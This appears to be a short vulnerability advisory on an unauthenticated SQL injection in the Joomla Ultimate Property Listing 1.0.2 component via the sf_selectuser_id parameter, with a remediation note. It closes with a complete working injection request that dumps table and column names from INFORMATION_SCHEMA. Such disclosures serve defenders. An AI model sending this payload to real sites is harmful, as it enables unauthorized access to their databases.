Joomla Ultimate Property Listing 1.0.2 SQL Injection via sf_selectuser_id

An unauthenticated attacker sends a crafted GET request to `index.php` with `option=com_upl`, `view=propertylisting`, and a malicious `sf_selectuser_id` parameter containing SQL injection payloads [ref_id=1]. The exploit example uses a `UNION ALL SELECT` statement with `EXPORT_SET` to extract database table names and column structures from `INFORMATION_SCHEMA.COLUMNS` [ref_id=1]. No authentication is required, and the attack is performed over HTTP.

The vulnerability exists in the Joomla! Ultimate Property Listing component version 1.0.2. The `sf_selectuser_id` parameter in the `index.php` file is not sanitized before being used in SQL queries, allowing injection through the `option=com_upl` and `view=propertylisting` request parameters [ref_id=1].

The advisory does not include a published patch. To remediate, the application must properly sanitize or parameterize the `sf_selectuser_id` parameter before including it in SQL queries, preventing injection of arbitrary SQL statements.

Send a GET request to `http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&sf_selectuser_id=-109'+UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332,0x3333,0x3334,0x3335,0x3336,0x3337,0x3338,0x3339,0x3430,0x3431,0x3432,0x3433,0x3434,0x3435,0x3436,0x3437,0x3438,0x3439,0x3530,0x3531,0x3532,0x3533,0x3534,0x3535,0x3536,0x3537,0x3538,0x3539,0x3630,0x3631,0x3632,0x3633,0x3634,0x3635,0x3636,0x3637,0x3638,0x3639,0x3730,0x3731,0x3732,0x3733,0x3734,0x3735,0x3736,0x3737,0x3738,0x3739,0x3830,0x3831,0x3832,0x3833,0x3834,0x3835,0x3836,0x3837--+-` as described in the exploit [ref_id=1].